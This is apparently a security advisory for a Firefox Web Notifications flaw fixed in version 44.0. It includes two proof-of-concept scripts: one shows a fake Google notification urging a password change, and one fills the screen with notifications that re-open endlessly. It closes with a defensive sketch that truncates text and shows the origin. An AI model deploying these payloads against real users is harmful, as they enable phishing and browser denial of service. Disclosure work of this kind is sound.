Vulnerability Details:
Fixed in Firefox 44.0
(1) The notification dialog shows no origin hint or warning. An attacker can therefore display a malicious notification dialog that appears to originate from a trusted site. Typically this notification dialog would mimic the legitimate site. An attacker may exploit this vulnerability to spoof the interface of a trusted web site.
Origin Spoof Demo: http://xisigr.com/test/notification/1.html
<script>
window.addEventListener('load', function () {
  if (window.Notification && Notification.permission !== "granted") {
    Notification.requestPermission(function (status) {
      if (Notification.permission !== status) {
        Notification.permission = status;
      }
    });
  }
  var button = document.getElementsByTagName('button')[0];
  button.addEventListener('click', function () {
    if (window.Notification && Notification.permission === "granted") {
      window.open("http://www.google.com",'_self');
      dd = function(){
        var n = new Notification(
          "Google",
          {
            body:'Please change your password',
            icon:'https://www.google.com.hk/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png'
          }
        );
      }
      setTimeout(dd,50);
    }
  });
});
</script>
<button>Notify me!</button>
(2) A Web Notification is displayed in full, so the notification dialog can take up the full screen, which allows a denial-of-service attack.
FullScreen Display DOS Demo: http://xisigr.com/test/notification/2.html
<script> window.addEventListener('load', function () { if (window.Notification && Notification.permission !== "granted") { Notification.requestPermission(function (status) { if (Notification.permission !== status) { Notification.permission = status; } }); } var button = document.getElementsByTagName('button')[0]; button.addEventListener('click', function () { if (window.Notification && Notification.permission === "granted") { dd = function(){ var n = new Notification( "11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111", { body:'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ', } ); n.onclose = function () { setTimeout(function () { dd(); }, 0); } } setTimeout(dd,50); } }); }); </script> <button>Notify me!</button> |
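Both issues come down to page-controlled strings reaching the dialog unbounded and without an origin label chosen by the browser. The sketch below is an added example, not Firefox's fix and not code from the original advisory; the function names and size limits are assumptions, and the inputs are constructed from the two demos.

```javascript
// Added illustration, not Firefox code. Names and limits are assumptions.
const MAX_TITLE_CHARS = 64;
const MAX_LINE_CHARS = 80;
const MAX_BODY_LINES = 4;

// Flatten control characters and whitespace runs, then truncate by code point.
function clampLine(text, maxChars) {
  const flat = String(text).replace(/[\u0000-\u001f\u007f\s]+/g, " ").trim();
  const chars = Array.from(flat);
  if (chars.length <= maxChars) return flat;
  return chars.slice(0, maxChars - 1).join("") + "\u2026";
}

// Keep at most MAX_BODY_LINES non-empty lines so newline padding cannot grow the dialog.
function clampBody(text) {
  return String(text)
    .split(/\r?\n/)
    .map((line) => clampLine(line, MAX_LINE_CHARS))
    .filter((line) => line.length > 0)
    .slice(0, MAX_BODY_LINES)
    .join("\n");
}

// creatorUrl is the URL of the document that called `new Notification(...)`,
// recorded by the UI layer itself. Title, body and icon are page-controlled
// and never influence the origin label.
function buildNotificationView(creatorUrl, title, options = {}) {
  return {
    originLabel: new URL(creatorUrl).origin,
    title: clampLine(title, MAX_TITLE_CHARS),
    body: clampBody(options.body ?? ""),
  };
}

// Constructed inputs modelled on the two demos above.
function demo() {
  const spoof = buildNotificationView(
    "http://xisigr.com/test/notification/1.html",
    "Google",
    { body: "Please change your password" }
  );
  const flood = buildNotificationView(
    "http://xisigr.com/test/notification/2.html",
    "1".repeat(400),
    { body: "\n".repeat(90) + " " }
  );
  return { spoof, flood };
}
```

With the origin label rendered next to the title, the "Google" notification from the first demo is shown as coming from http://xisigr.com, and the padded title and body from the second demo collapse to one short line.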
References:
https://bugzilla.mozilla.org/show_bug.cgi?id=1220519
CREDIT:
This vulnerability was discovered by xisigr of Tencent’s Xuanwu LAB (http://www.tencent.com).
Email: xisigr@gmail.com